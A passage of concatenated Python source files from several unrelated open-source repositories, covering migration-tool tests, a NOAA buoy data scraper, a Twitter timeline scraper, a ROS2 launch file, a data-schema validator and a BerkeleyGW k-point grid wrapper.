EnvironmentUtil.teardown_fresh_test_env()
def test_create_down(self):
sys.argv = make_argv(['-f', 'test-file'])
self.newCommand.run()
files = os.walk(os.getcwd()).next()[2]
files = [f for f in files if not f.find('test-file') == -1]
files = [f for f in files if not f.find('down') == -1]
self.assertTrue(len(files) == 1)
def test_create_up(self):
sys.argv = make_argv(['-f', 'test-file'])
self.newCommand.run()
files = os.walk(os.getcwd()).next()[2]
files = [f for f in files if not f.find('test-file') == -1]
files = [f for f in files if not f.find('up') == -1]
self.assertTrue(len(files) == 1)
def test_creates_two_files_on_new(self):
sys.argv = make_argv(['-f', 'test-file'])
self.newCommand.run()
files = os.walk(os.getcwd()).next()[2]
files = [f for f in files if not f.find('test-file') == -1]
self.assertTrue(len(files) == 2)
def test_create_files_without_name(self):
sys.argv = make_argv([])
self.newCommand.run()
files = os.walk(os.getcwd()).next()[2]
files = [f for f in files if not f.find('sql') == -1]
self.assertTrue(len(files) == 2)
def test_creates_proper_alter_chain(self):
sys.argv = make_argv(['-f', '1'])
self.newCommand.run()
sleep(0.15)
sys.argv = make_argv(['-f', '2'])
self.newCommand.run()
chain_tail = ChainUtil.build_chain()
self.assertTrue(chain_tail.backref is not None)
self.assertTrue(chain_tail.backref.backref is None)
def test_no_backref_on_single_alter(self):
sys.argv = make_argv(['-f', '1'])
self.newCommand.run()
chain_tail = ChainUtil.build_chain()
self.assertTrue(chain_tail.backref is None)
if __name__ == '__main__':
unittest.main()
```
#### File: test/util/test_util.py
```python
def make_argv(argv):
# sys.argv[0] is the name of the executable - i.e. "foo" in "./foo bar".
# Since schematool methods receive args from the command line, correctly
# mocking sys.argv requires inserting a dummy value at index zero.
return [''] + argv
``` |
{
"source": "jonahgolden/buoy-buddy",
"score": 3
} |
#### File: app/buoy/buoy.py
```python
import pandas as pd
import re # For metadata parsing
from .datascrapers import RealtimeScraper
from .datascrapers import HistoricalScraper
class Buoy:
def __init__(self, buoy_id, data_dir="buoydata/"):
self.buoy_id = str(buoy_id)
self.metadata = self._get_metadata()
self.data_dir = data_dir
self.realtime = RealtimeScraper(self.buoy_id, data_dir)
self.historical = HistoricalScraper(self.buoy_id, data_dir)
@staticmethod
def get_buoys():
'''Get all available buoys. Returns pandas dataframe with buoy ids as index.'''
STATIONS_URL = "https://www.ndbc.noaa.gov/data/stations/station_table.txt"
# Get and format all stations info
stations = pd.read_csv(STATIONS_URL, delimiter = "|", index_col = 0).iloc[1:,:]
stations.index.name = 'station_id'
stations.columns = ['owner', 'ttype', 'hull', 'name', 'payload', 'location', 'timezone', 'forecast', 'note']
return stations
### On Init methods
def _get_metadata(self):
''' Helper method to populate metadata field with relevant information. '''
stations = self.get_buoys()
# Check if buoy id is valid
if self.buoy_id not in stations.index:
raise ValueError("{} is not a valid buoy id. Use static method Buoy.get_buoys() to get dataframe of all buoys.".format(self.buoy_id))
# Populate metadata
buoy_info = stations.loc[self.buoy_id,:]
metadata = {}
metadata['buoy_id'] = self.buoy_id
metadata['owner'] = self._get_owner_name(buoy_info['owner'])
metadata['ttype'] = buoy_info['ttype']
metadata['hull'] = buoy_info['hull']
metadata['name'] = buoy_info['name']
metadata['timezone'] = buoy_info['timezone']
metadata['forecast'] = buoy_info['forecast'] # More Forecasts: https://www.ndbc.noaa.gov/data/DAB_Forecasts/46087fc.html, https://www.ndbc.noaa.gov/data/Forecasts/
metadata['note'] = buoy_info['note']
# metadata['available historical'] = {"dtype":[years]}
# Latitude and Longitude parsing
lat_match = re.search(r'([0-9]{1,3}\.[0-9]{3}) ([NS])', buoy_info['location'])
lat = lat_match.group(1)
if lat_match.group(2) == 'S':
lat = '-' + lat
metadata['latitude'] = lat
lng_match = re.search(r'([0-9]{1,3}\.[0-9]{3}) ([WE])', buoy_info['location'])
lng = lng_match.group(1)
if lng_match.group(2) == 'W':
lng = '-' + lng
metadata['longitude'] = lng
return metadata
def _get_owner_name(self, owner_code):
''' Metadata helper function gets a buoy owner's full name based on buoy owner code. '''
OWNERS_URL = "https://www.ndbc.noaa.gov/data/stations/station_owners.txt"
try:
owners = pd.read_csv(OWNERS_URL, delimiter="|", skiprows=1, index_col=0)
owner = owners.loc["{:<3}".format(owner_code), :]
return "{}, {}".format(owner[0].rstrip(), owner[1].rstrip())
except:
return 'NaN'
### Getting Data methods
def get_realtime_dtypes(self):
'''Returns list of available realtime data types for this buoy.'''
return self.realtime.get_available_dtypes()
def get_historical_dtypes(self, dtypes=[], years=[], months=[]):
'''
Returns dict of available historical data types for this buoy based on inputs.
Note: Depending on inputs, this method is quite slow. TODO Make it faster.
Inputs :
dtypes : Optional. List of dtype strings to get available months and years for. Default is all dtypes.
years : Optional. List of year ints to get available dtypes for.
months : Optional. List of month ints to get available dtypes for.
Output :
dictionary representing available historical data based on inputs.
'''
available = {}
# If no inputs are provided, get all available data types.
if len(dtypes) == 0 and len(years) == 0 and len(months) == 0:
dtypes = self.historical.DTYPES
for dtype in dtypes:
available[dtype] = {}
available[dtype]['months']=self.historical._available_months(dtype)
available[dtype]['years']=self.historical._available_years(dtype)
if len(years) > 0:
available['years'] = {}
for year in years:
available['years'][year] = self.historical._available_dtypes_year(year)
if len(months) > 0:
available['months'] = {}
for month in months:
available['months'][month] = self.historical._available_dtypes_month(month)
return available
def get_realtime(self, dtype):
'''
Get realtime data (last 45 days) for specified data type
Input :
dtype : string representing data type to get data for.
Output :
pandas dataframe with datetime64[ns, UTC] index.
'''
if dtype not in self.realtime.DTYPES:
print("Possible realtime dtypes are: {}".format(list(self.realtime.DTYPES)))
else:
df = self.realtime.scrape_dtype(dtype)
if df.empty:
print("{} not available for buoy {}. Use method 'get_realtime_dtypes' to get available realtime data types for this buoy.".format(dtype, self.buoy_id))
else: return df
def get_historical(self, dtype, year=None, month=None):
'''
Get realtime data (last 45 days) for specified data type
Input :
dtype : string representing data type to get data for.
Up to one of the following (default is all available data):
year : int, optional. Single year to get data for.
month : int in range [1, 12], optional. Single month this year to get data for.
Output :
pandas dataframe with datetime64[ns, UTC] index.
'''
if dtype not in self.historical.DTYPES:
print("Possible historical dtypes are: {}".format(list(self.historical.DTYPES)))
return
if year and month:
raise Exception("Can only provide one of `year` and `month`.")
if year:
df = self.historical.scrape_year(dtype, year)
if df.empty: print("{} for year {} not available for buoy {}. Use method 'get_historical_dtypes(year={})' to get available historical data types for this buoy and year.".format(dtype,year,self.buoy_id,year))
else: return df
elif month:
df = self.historical.scrape_month(dtype, month)
if df.empty: print("{} for month {} not available for buoy {}. Use method 'get_historical_dtypes(month={})' to get available historical data types for this buoy and month.".format(dtype,month,self.buoy_id,month))
else: return df
else:
df = self.historical.scrape_dtype(dtype)
if df.empty: print("{} not available for buoy {}. Use method 'get_historical_dtypes()' to get available historical data types for this buoy.".format(dtype,self.buoy_id))
else: return df
### Saving / Loading methods
def save_realtime(self, dtypes=None):
'''
Saves realtime data as pickled dataframes.
Input :
dtypes : Optional, list of data types to save. Default is all available data types.
'''
self.realtime.scrape_dtypes(dtypes)
def save_historical(self, dtypes=None):
'''
Saves historical data as pickled dataframes.
Input :
dtypes : Optional, list of data types to save. Default is all available data types.
'''
self.historical.scrape_dtypes(dtypes)
def load_realtime(self, dtype, timezone='UTC'):
'''
Loads dataframe that was previously saved with method `save_realtime`
Input :
dtype : string representing data type to load data for.
timezone : string, optional. Timezone to set index to. Default is `UTC`
Output :
pandas dataframe
'''
path = "{}{}/realtime/{}.pkl".format(self.data_dir, self.buoy_id, dtype)
return self._load_dataframe(path, timezone)
def load_historical(self, dtype, timezone='UTC'):
'''
Loads dataframe that was previously saved with method `save_historical`
Input :
dtype : string representing data type to load data for.
timezone : string, optional. Timezone to set index to. Default is `UTC`
Output :
pandas dataframe
'''
path = "{}{}/historical/{}.pkl".format(self.data_dir, self.buoy_id, dtype)
return self._load_dataframe(path, timezone)
def load_data(self, dtype, cols=None, timezone='UTC'):
real, hist = self.load_realtime(dtype, timezone), self.load_historical(dtype, timezone)
both = pd.concat([hist, real], sort=True)
if cols: return both[cols]
else: return both
def _load_dataframe(self, file_path, timezone):
''' Helper method to load a pickled dataframe. '''
try:
data = pd.read_pickle(file_path)
return data.tz_convert(timezone)
except OSError:
print("No pickle at {}".format(file_path))
except:
print("{} is not a valid timezone for pandas DataFrame.tz_convert() method.".format(timezone))
def __repr__(self):
return "Station ID: {}\nStation Name: {}\nLocation: {}, {}\nTime Zone: {}\nOwner: {}\nTtype: {}\nNotes: {}".format(
self.buoy_id, self.metadata['name'], self.metadata['latitude'], self.metadata['longitude'], self.metadata['timezone'],
self.metadata['owner'], self.metadata['ttype'], self.metadata['note']
)
```
#### File: buoy/datascrapers/buoy_data_scraper.py
```python
import pandas as pd
import requests # For checking url validity
import os # For saving to data directory
class BuoyDataScraper:
def __init__(self, buoy_id):
self.buoy_id = buoy_id
def _scrape_norm(self, url, headers=[0,1], na_vals=['MM'], date_cols=[0,1,2,3,4], date_format="%Y %m %d %H %M"):
'''
Scrapes data for "normal" data types (all historical after 2006, and realtime dtypes "stdmet", "adcp", "cwind", "supl", "spec").
All of these data types share similar formats, with only differences being the header and NA values.
Inputs :
url : string
the url to scrape data from
header : list of ints
the row number for the headers
na_vals : list
values that should be treated as NA
Output :
df : pandas dataframe with datetime index localized to UTC representing the data
'''
# read the data and combine first 5 columns into datetime index
df = pd.read_csv(url, header=headers, delim_whitespace=True, na_values=na_vals, parse_dates={'datetime':date_cols}, index_col=0)
df.index = pd.to_datetime(df.index,format=date_format).tz_localize('UTC')
# remove all headers but first
while df.columns.nlevels > 1:
df.columns = df.columns.droplevel(1)
df.columns.name = 'columns'
return df
def _url_valid(self, url):
request = requests.get(url)
return request.status_code == 200
def _create_dir_if_not_exists(self, data_dir):
try: os.makedirs(data_dir)
except FileExistsError: pass
```
#### File: buoy/datascrapers/historical_scraper.py
```python
import pandas as pd
from datetime import datetime
from .buoy_data_scraper import BuoyDataScraper
class HistoricalScraper(BuoyDataScraper):
DTYPES = {"stdmet":{"url_code":"h", "name":"Standard metorological"},
"swden": {"url_code":"w", "name":"Spectral wave density"},
"swdir": {"url_code":"d", "name":"Spectral wave (alpha1) direction"},
"swdir2":{"url_code":"i", "name":"Spectral wave (alpha2) direction"},
"swr1": {"url_code":"j", "name":"Spectral wave (r1) direction"},
"swr2": {"url_code":"k", "name":"Spectral wave (r2) direction"},
"adcp": {"url_code":"a", "name":"Ocean current"},
"cwind": {"url_code":"c", "name":"Continuous winds"},
"ocean": {"url_code":"o", "name":"Oceanographic"},
"dart": {"url_code":"t", "name":"Water column height (Tsunami) (DART)"}
}
BASE_URL_YEAR = "https://www.ndbc.noaa.gov/view_text_file.php?filename={}{}{}.txt.gz&dir=data/historical/{}/"
BASE_URL_MONTH = "https://www.ndbc.noaa.gov/view_text_file.php?filename={}{}{}.txt.gz&dir=data/{}/{}/"
MONTHS = {1: {"name":"Jan", "url_code":1},
2: {"name":"Feb", "url_code":2},
3: {"name":"Mar", "url_code":3},
4: {"name":"Apr", "url_code":4},
5: {"name":"May", "url_code":5},
6: {"name":"Jun", "url_code":6},
7: {"name":"Jul", "url_code":7},
8: {"name":"Aug", "url_code":8},
9: {"name":"Sep", "url_code":9},
10:{"name":"Oct", "url_code":'a'},
11:{"name":"Nov", "url_code":'b'},
12:{"name":"Dec", "url_code":'c'}
}
MIN_YEAR = 2007
def __init__(self, buoy_id, data_dir="buoydata/"):
super().__init__(buoy_id)
self.data_dir = "{}{}/historical/".format(data_dir, buoy_id)
def scrape_dtypes(self, dtypes=None):
'''
Scrapes and saves all known historical data for this buoy.
Input :
dtypes : Optional, list of dtype strings. Default is all available dtypes.
Notes : * If self.data_dir doesn't exist, it will be created.
* Existing files will be overwritten.
'''
if not dtypes: dtypes=self.DTYPES
for dtype in dtypes:
self.scrape_dtype(dtype, save=True)
def scrape_dtype(self, dtype, save=False):
'''
Scrapes and optionally saves all historical data for a given dtype.
Input :
dtype : string, must be an available data type for this buoy
save_pkl : default False. If True, saves data frame as pickle.
data_dir : default self.data_dir. directory to save data to is save_pkl is True.
Output :
pandas dataframe. If save_pkl is True, also saves pickled dataframe.
Notes : * If self.data_dir doesn't exist, it will be created.
* If save_pkl is True, existing file will be overwritten.
'''
df = pd.DataFrame()
for year in range(self.MIN_YEAR, datetime.now().year):
data = self.scrape_year(dtype, year)
if not data.empty:
if df.empty: df = data
else: df = df.append(data)
for month in range(1, datetime.now().month):
data = self.scrape_month(dtype, month)
if not data.empty:
if df.empty: df = data
else: df = df.append(data)
if not df.empty and save:
self._create_dir_if_not_exists(self.data_dir)
path = "{}{}.pkl".format(self.data_dir, dtype)
df.to_pickle(path)
print("Saved data to {}".format(path))
else:
return df
def scrape_year(self, dtype, year):
'''
Scrapes data for a given dtype and year. Calls helper function to scrape specific dtype.
See helper functions below for columns and units of each dtype.
More info at: https://www.ndbc.noaa.gov/measdes.shtml
Input :
dtype : string, must be an available data type for this buoy
year : int in range 2006 and this year, not inclusive.
Output :
pandas dataframe.
'''
if year < self.MIN_YEAR:
raise AttributeError("Minimum year is {}".format(self.MIN_YEAR))
url = self._make_url_year(dtype, year)
df = pd.DataFrame()
if self._url_valid(url):
df = getattr(self, dtype)(url)
return df
def scrape_month(self, dtype, month):
'''
Scrapes data for a given dtype and month. Calls helper function to scrape specific dtype.
See helper functions below for columns and units of each dtype.
More info at: https://www.ndbc.noaa.gov/measdes.shtml
Input :
dtype : string, must be an available data type for this buoy
month : int in range 0 and this month, not inclusive.
Output :
pandas dataframe.
Note: Data for most recent month may not yet be available.
'''
url = self._make_url_month(dtype, month)
df = pd.DataFrame()
if self._url_valid(url):
df = getattr(self, dtype)(url)
return df
def stdmet(self, url):
'''
Standard Meteorological Data
dtype: "stdmet"
index: datetime64[ns, UTC]
columns: WDIR WSPD GST WVHT DPD APD MWD PRES ATMP WTMP DEWP VIS PTDY TIDE
units: degT m/s m/s m sec sec degT hPa degC degC degC nmi hPa ft
'''
NA_VALS = ['MM', 99., 999.]
df = self._scrape_norm(url, na_vals=NA_VALS)
df.columns.name = 'columns'
return df
def swden(self, url):
'''
Spectral wave density
dtype: "swden"
index: datetime64[ns, UTC]
columns: .0200 .0325 .0375 ... .4450 .4650 .4850 (frequencies in Hz)
units: Spectral Wave Density/Energy in m^2/Hz for each frequency bin
'''
NA_VALS = ['MM']
df = self._scrape_norm(url, na_vals=NA_VALS)
df.columns.name = 'frequencies'
return df
def swdir(self, url):
'''
Spectral Wave Data (alpha1, mean wave direction)
dtype: "swdir"
index: datetime64[ns, UTC]
columns: 0.033 0.038 0.043 ... 0.445 0.465 0.485 (frequencies in Hz)
units: direction (in degrees from true North, clockwise) for each frequency bin.
'''
NA_VALS = ['MM', 999.]
df = self._scrape_norm(url, na_vals=NA_VALS)
df.columns.name = 'frequencies'
return df.astype('float')
def swdir2(self, url):
'''
Spectral Wave Data (alpha2, principal wave direction)
dtype: "swdir2"
index: datetime64[ns, UTC]
columns: 0.033 0.038 0.043 ... 0.445 0.465 0.485 (frequencies in Hz)
units: direction (in degrees from true North, clockwise) for each frequency bin.
'''
NA_VALS= ['MM', 999.]
df = self._scrape_norm(url, na_vals=NA_VALS)
df.columns.name = 'frequencies'
return df.astype('float')
def scrape_swr1(self, url):
'''
Spectral Wave Data (r1, directional spreading for alpha1)
dtype: "swr1"
index: datetime64[ns, UTC]
columns: 0.033 0.038 0.043 ... 0.445 0.465 0.485 (frequencies in Hz)
units: Ratio (between 0 and 100) describing the spreading about the main direction.
Note: r1 and r2 historical values are scaled by 100.
Units are hundredths, so they are multiplied by 0.01 here.
'''
NA_VALS, FACTOR = ['MM', 999.], 0.01
df = self._scrape_norm(url, na_vals=NA_VALS)
df.columns.name = 'frequencies'
df[df.select_dtypes(include=['number']).columns] *= FACTOR
return df
def swr2(self, url):
'''
Spectral Wave Data (r2, directional spreading for alpha2)
dtype: "swr2"
index: datetime64[ns, UTC]
columns: 0.033 0.038 0.043 ... 0.445 0.465 0.485 (frequencies in Hz)
units: Ratio (between 0 and 100) describing the spreading about the main direction.
Note: r1 and r2 historical values are scaled by 100.
Units are hundredths, so they are multiplied by 0.01 here.
'''
NA_VALS, FACTOR = ['MM', 999.], 0.01
df = self._scrape_norm(url, na_vals=NA_VALS)
df.columns.name = 'frequencies'
df[df.select_dtypes(include=['number']).columns] *= FACTOR
return df
def adcp(self, url):
'''
Acoustic Doppler Current Profiler Data
dtype: "adcp"
index: datetime64[ns, UTC]
columns: DEP01 DIR01 SPD01
units: m degT cm/s
'''
NA_VALS = ['MM']
df = self._scrape_norm(url, na_vals=NA_VALS)
return df.iloc[:,0:3].astype('float')
def cwind(self, url):
'''
Continuous Winds Data
dtype: "cwind"
index: datetime64[ns, UTC]
columns: WDIR WSPD GDR GST GTIME
units: degT m/s degT m/s hhmm
'''
NA_VALS = ['MM', 99., 999., 9999.]
df = self._scrape_norm(url, na_vals=NA_VALS)
return df
def ocean(self, url):
'''
Oceanographic Data
dtype: "ocean"
index: datetime64[ns, UTC]
columns: DEPTH OTMP COND SAL O2% O2PPM CLCON TURB PH EH
units: m degC mS/cm psu % ppm ug/l FTU - mv
'''
NA_VALS = ['MM', 99., 999.]
return self._scrape_norm(url, na_vals=NA_VALS)
def dart(self, url):
'''
Water column height (Tsunami) (DART)
dtype: "dart"
index: datetime64[ns, UTC]
columns: T HEIGHT
units: enum (measurement type) m (height of water column)
* 1 = 15-minute
* 2 = 1-minute
* 3 = 15-second
Notes : * See Tsunami detection algorithm here: https://www.ndbc.noaa.gov/dart/algorithm.shtml
'''
NA_VALS, DATE_COLS, DATE_FORMAT = ['MM', 9999.], [0,1,2,3,4,5], "%Y %m %d %H %M %S"
return self._scrape_norm(url, na_vals=NA_VALS, date_cols=DATE_COLS, date_format=DATE_FORMAT)
def _available_dtypes_year(self, year):
'''Returns list of available data types for a given year.'''
available_types = []
for dtype in self.DTYPES:
if self._url_valid(self._make_url_year(dtype, year)):
available_types.append(dtype)
return available_types
def _available_dtypes_month(self, month):
'''Returns list of available data types for a given month.'''
available_types = []
for dtype in self.DTYPES:
if self._url_valid(self._make_url_month(dtype, month)):
available_types.append(dtype)
return available_types
def _available_years(self, dtype):
'''Returns list of available years for a given data type.'''
available_years = []
for year in range(self.MIN_YEAR, datetime.now().year):
if self._url_valid(self._make_url_year(dtype, year)):
available_years.append(year)
return available_years
def _available_months(self, dtype):
'''Returns list of available months for a given data type.'''
available_months = []
for month in range(1, datetime.now().month):
if self._url_valid(self._make_url_month(dtype, month)):
available_months.append(month)
return available_months
def _make_url_year(self, dtype, year):
'''Makes a url for a given data type and year.'''
return self.BASE_URL_YEAR.format(self.buoy_id, self.DTYPES[dtype]["url_code"], year, dtype)
def _make_url_month(self, dtype, month):
'''Makes a url for a given data type and month.'''
return self.BASE_URL_MONTH.format(self.buoy_id, self.MONTHS[month]["url_code"], datetime.now().year, dtype, self.MONTHS[month]["name"])
``` |
{
"source": "JonahGoot/TwitterSkynet",
"score": 3
} |
#### File: JonahGoot/TwitterSkynet/tweetscrape.py
```python
import json
import csv
import tweepy
import re
Ckeys = []
with open('ScanKeys.txt', 'r', encoding='utf-8') as f:
keys = f.readlines()
for key in keys:
key = key.replace('\n', "")
a,b = key.split(" ", 1)
Ckeys.append(b)
consumer_key = Ckeys[0]
consumer_key_secret = Ckeys[1]
bearer_token = Ckeys[2]
access_token = Ckeys[3]
access_token_secret = Ckeys[4]
#create authentication for accessing Twitter
auth = tweepy.OAuthHandler(consumer_key, consumer_key_secret)
auth.set_access_token(access_token, access_token_secret)
#initialize Tweepy API
api = tweepy.API(auth, wait_on_rate_limit=True, wait_on_rate_limit_notify=True)
def main():
with open('ProfilesToScrape.txt', 'r', encoding='utf-8') as f:
lines = f.readlines()
print("Extracting tweets from " + str(len(lines)) + " profiles:")
for line in lines:
line = line.replace('\n', "")
print(line)
line = ScrapeInstance(line)
line.createfile()
line.ScrapeIntoFile()
class ScrapeInstance:
def __init__(self, name):
self.name = name
self.f = None
def createfile(self):
filename = "tweetdata" + self.name + ".txt"
self.f = open(filename, "w", encoding='utf-8')
def ScrapeIntoFile(self):
for tweet in tweepy.Cursor(api.user_timeline,id=self.name, tweet_mode='extended', include_rts=False).items():
text = tweet.full_text
self.f.write(text.replace('\n',' ').replace('&', '') + ('\n'))
self.f.close()
if __name__ == "__main__":
main()
#JoeBiden = ScrapeInstance("JoeBiden")
#JoeBiden.createfile()
#JoeBiden.scrapeintofile()
``` |
{
"source": "jonah-gourlay44/gym2real",
"score": 2
} |
#### File: controller/launch/controller.launch.py
```python
from launch import LaunchDescription
from launch_ros.actions import Node
def generate_launch_description():
return LaunchDescription([
Node(
package='controller',
executable='controller',
name='controller',
)
])
``` |
{
"source": "JonahGroendal/Python-Data-Schema",
"score": 3
} |
#### File: JonahGroendal/Python-Data-Schema/python_data_schema.py
```python
__author__ = "<NAME>"
#################################
# Decorators for and_() and or_()
#################################
def canonicalize_args(if_dict):
'Returns a list of validators (functions that take one argument and return a boolean)'
def decorator(func):
def wrapper(*args):
if type_is_(dict)(args[0]):
args = if_dict(args[0])
elif type_is_(list)(args[0]):
args = args[0]
else:
args = list(args)
return func(args)
return wrapper
return decorator
# {key : value} are {validator generator : validator generator argument}
# key(value) returns a validator
def eval_function_argument_pairs(func_arg_pairs):
return [k(v) for k,v in func_arg_pairs.items()]
# {key : value} are {validator for key : validator for value} (not validator generators!)
def translate_shorthand_syntax(key_value_validators):
args = []
for key_validator, value_validator in key_value_validators.items():
if or_(type_is_(str), type_is_(int))(key_validator):
key_validator = equals_(key_validator)
args.append(and_(key_(key_validator), value_(value_validator)))
return args
###########################################################
# Validator generators (Each returns a validator function)
###########################################################
def is_(value):
def validator(data):
return data is value
return validator
def equals_(value):
def validator(data):
return data == value
return validator
def greater_than_(value):
def validator(data):
return data > value
return validator
def less_than_(value):
def validator(data):
return data < value
return validator
@canonicalize_args(if_dict=eval_function_argument_pairs)
def and_(validators):
'ands together validators'
def validator(data):
for val in validators:
if not val(data):
return False
return True
return validator
@canonicalize_args(if_dict=translate_shorthand_syntax)
def or_(validators):
'ors together validators'
def validator(data):
for val in validators:
if val(data):
return True
return False
return validator
def for_each_item_(element_validator):
'for each item in data (list or dict)'
def validator(list_or_dict_data):
if type_is_(dict)(list_or_dict_data):
list_or_dict_data = list_or_dict_data.items()
return all(map(element_validator, list_or_dict_data))
return validator
# Predefined example of how to use data_()
def type_is_(value):
return data_(type)(is_(value))
##########################################################################
# Validator data modifiers (modifies data before it's passed to validator)
##########################################################################
def data_(data_modifier):
def wrapper(validation_func):
def validator(data):
return validation_func(data_modifier(data))
return validator
return wrapper
def key_(validation_func):
return data_(atIndex(0))(validation_func)
def value_(validation_func):
return data_(atIndex(1))(validation_func)
##########################################
# data_modifier funcs for use with data_()
##########################################
def atIndex(i):
return lambda data: data[i]
``` |
{
"source": "jonahhaber/BGWpy",
"score": 2
} |
#### File: BGWpy/BGW/kgrid.py
```python
import os
import subprocess
import numpy as np
from ..core import fortran_str
from ..core import Task
__all__ = ['get_kpt_grid', 'get_kgrid_input', 'get_kpoints', 'get_kqshift',
'get_kpt_grid_nosym', 'KgridTask']
class KgridTask(Task):
def __init__(self,
structure,
ngkpt = 3*[1],
kshift = 3*[.0],
qshift = 3*[.0],
fft = 3*[0],
use_tr=False,
executable='kgrid.x', # TODO remove executable and make bindir a global option
rootname='tmp.kgrid',
clean_after=True,
dirname='',
**kwargs):
"""
Arguments
---------
structure : pymatgen.Structure
Structure object containing information on the unit cell.
ngkpt : list(3), int, optional
K-points grid. Number of k-points along each primitive vector
of the reciprocal lattice.
kshift : list(3), float, optional
Relative shift of the k-points grid along each direction,
as a fraction of the smallest division along that direction.
qshift : list(3), float, optional
Absolute shift of the k-points grid along each direction.
fft : list(3), int, optional
Number of points along each direction of the fft grid.
use_tr : bool
Use time reversal symmetry.
"""
rootname = os.path.join(dirname, rootname)
self.dirname = os.path.dirname(rootname)
self.inputname = rootname + '.in'
self.outputname = rootname + '.out'
self.logname = rootname + '.log'
self.executable = executable
self.clean_after = clean_after
self.structure = structure
self.ngkpt = np.array(ngkpt)
self.kshift = np.array(kshift)
self.qshift = np.array(qshift)
self.fft = fft
self.use_tr = use_tr
def read_kpoints(self):
"""Read a list of kpoints and their weights from kgrid.x output file."""
with open(self.outputname, 'r') as f:
content = f.read()
lines = content.splitlines()[2:]
kpoints = list()
weights = list()
for line in lines:
k = [ float(ki) for ki in line.split()[:3] ]
w = float(line.split()[-1])
kpoints.append(k)
weights.append(w)
return kpoints, weights
@property
def new_dir(self):
return self.dirname and not os.path.exists(self.dirname)
def write(self):
if self.new_dir:
subprocess.call(['mkdir', '-p', self.dirname])
with open(self.inputname, 'w') as f:
f.write(self.get_kgrid_input())
def run(self):
try:
subprocess.call([self.executable, self.inputname,
self.outputname, self.logname])
except OSError as E:
message = (str(E) + '\n\n' +
79 * '=' + '\n\n' +
'Could not find the executable kgrid.x\n' +
'Please make sure it is available for execution.\n' +
'On a computing cluster, you might do this my loading the module:\n' +
' module load berkeleygw\n' +
"If you compiled BerkeleyGW yourself, " +
"make sure that the 'bin' directory\n" +
'of BerkeleyGW is listed in your PATH environment variable.\n' +
'\n' + 79 * '=' + '\n')
raise OSError(message)
def clean_up(self):
"""Remove all temporary files (input, output log)."""
for fname in (self.inputname, self.outputname, self.logname):
if os.path.exists(fname):
try:
os.remove(fname)
except Exception as E:
print(E)
if self.new_dir:
try:
os.removedirs(dirname)
except Exception as E:
print(E)
def get_kgrid_input(self):
"""Make a kgrid.x input, using pymatgen.Structure object."""
structure = self.structure
kshift = self.kshift
qshift = self.qshift
ngkpt = self.ngkpt
fft = self.fft
use_tr = self.use_tr
abc = np.array(structure.lattice.abc)
latt_vec_rel = (structure.lattice.matrix.transpose() / abc).transpose().round(12)
pos_cart_rel = np.dot(structure.frac_coords, latt_vec_rel).round(6)
S = ''
for arr in (ngkpt, kshift, qshift):
S += fortran_str(arr) + '\n'
S += '\n'
for arr in latt_vec_rel.tolist() + [structure.num_sites]:
S += fortran_str(arr) + '\n'
for Z, pos in zip(structure.atomic_numbers, pos_cart_rel):
S += str(Z) + ' ' + fortran_str(pos) + '\n'
for arr in (fft, use_tr):
S += fortran_str(arr) + '\n'
return S
@staticmethod
def get_kqshift(self, ngkpt, kshift, qshift):
"""Add an absolute qshift to a relative kshift."""
kqshiftk = [ kshift[i] + qshift[i] * ngkpt[i] for i in range(3) ]
return kqshiftk
def get_kpt_grid_nosym(self):
"""
Return a list of kpoints generated with out any symmetry,
along with their weights.
"""
ngkpt = self.ngkpt
kshift = self.kshift
qshift = self.qshift
nkx, nky, nkz = ngkpt
kpoints = list()
weights = list()
for ikx in range(nkx):
for iky in range(nky):
for ikz in range(nkz):
k = (np.array([ikx, iky, ikz]) + kshift) / ngkpt + qshift
kpoints.append(k)
weights.append(1.)
return np.array(kpoints), np.array(weights)
def read_symmetries(self):
"""Read the symmetries matrices and translation vectors."""
with open(self.logname, 'r') as f:
while True:
try:
line = f.next()
if 'symmetries of the crystal without FFT grid' in line:
line = f.next()
nsym = int(line)
line = f.next()
assert 'Space group' in line
syms = np.zeros((nsym, 9), dtype=np.int)
taus = np.zeros((nsym, 3), dtype=np.float)
for i in range(nsym):
line = f.next()
parts = line.split()
syms[i,:] = map(int, parts[2:11])
taus[i,:] = map(float, parts[11:14])
break
except StopIteration:
break
except ValueError as e:
raise Exception('Could not parse kgrid file.\n\n' + str(e))
return syms, taus
def get_kpoints(self):
"""Write, run and extract kpoints. Return kpt, wtk."""
try:
self.write()
self.run()
return self.read_kpoints()
finally:
if self.clean_after:
self.clean_up()
def get_symmetries(self):
"""Write, run and extract symmetries."""
try:
self.write()
self.run()
return self.read_symmetries()
finally:
if self.clean_after:
self.clean_up()
def get_kpoints_and_sym(self):
"""Write, run and extract kpoints and symmetries."""
try:
self.write()
self.run()
outkpt = self.read_kpoints()
outsym = self.read_symmetries()
return outkpt, outsym
finally:
if self.clean_after:
self.clean_up()
# =========================================================================== #
""" Constructor functions """
def get_kpt_grid(structure, ngkpt,
executable='kgrid.x', # TODO remove executable and make bindir a global option
rootname='tmp.kgrid', clean_after=True, **kwargs):
"""
Use kgrid.x to compute the list of kpoint and their weight.
Arguments
---------
structure: pymatgen.Structure
The cell definition of the system.
ngkpt: array(3)
The k-point grid.
executable: str
The path to kgrid.x
rootname: str
For the file names
exec_dir: str
Where to write the files.
clean_after: bool
Remove files afterward.
Keyword Arguments
-----------------
Any other argument to pass to get_kgrid_input, including:
kshift:
A k-point shift (relative to the grid spacing).
qshift:
A q-point shift (absolute, in reduced coord.)
Returns
-------
kpts: A list of k-points (as a 2D list).
wtks: A list of weights.
"""
dirname = os.path.dirname(rootname)
new_dir = dirname and not os.path.exists(dirname)
inputname = rootname + '.in'
outputname = rootname + '.out'
logname = rootname + '.log'
inputcontent = get_kgrid_input(structure, ngkpt, **kwargs)
# Write the input
if new_dir:
#os.system('mkdir -p ' + dirname)
subprocess.call(['mkdir', '-p', dirname])
with open(inputname, 'w') as f:
f.write(inputcontent)
# Run kgrid.x
try:
subprocess.call([executable, inputname, outputname, logname])
except OSError as E:
message = (str(E) + '\n\n' +
79 * '=' + '\n\n' +
'Could not find the executable {} .\n'.format(executable) +
'Please make sure it is available for execution.\n' +
'On a computing cluster, you might do this my loading the module:\n' +
' module load berkeleygw\n' +
"If you compiled BerkeleyGW yourself, " +
"make sure that the 'bin' directory\n" +
'of BerkeleyGW is listed in your PATH environment variable.\n' +
'\n' + 79 * '=' + '\n')
raise OSError(message)
# Read the output
with open(outputname, 'r') as f:
outputcontent = f.read()
# Clean up
if clean_after:
for fname in (inputname, outputname, logname):
if os.path.exists(fname):
try:
os.remove(fname)
except Exception as E:
print(E)
if new_dir:
try:
os.removedirs(dirname)
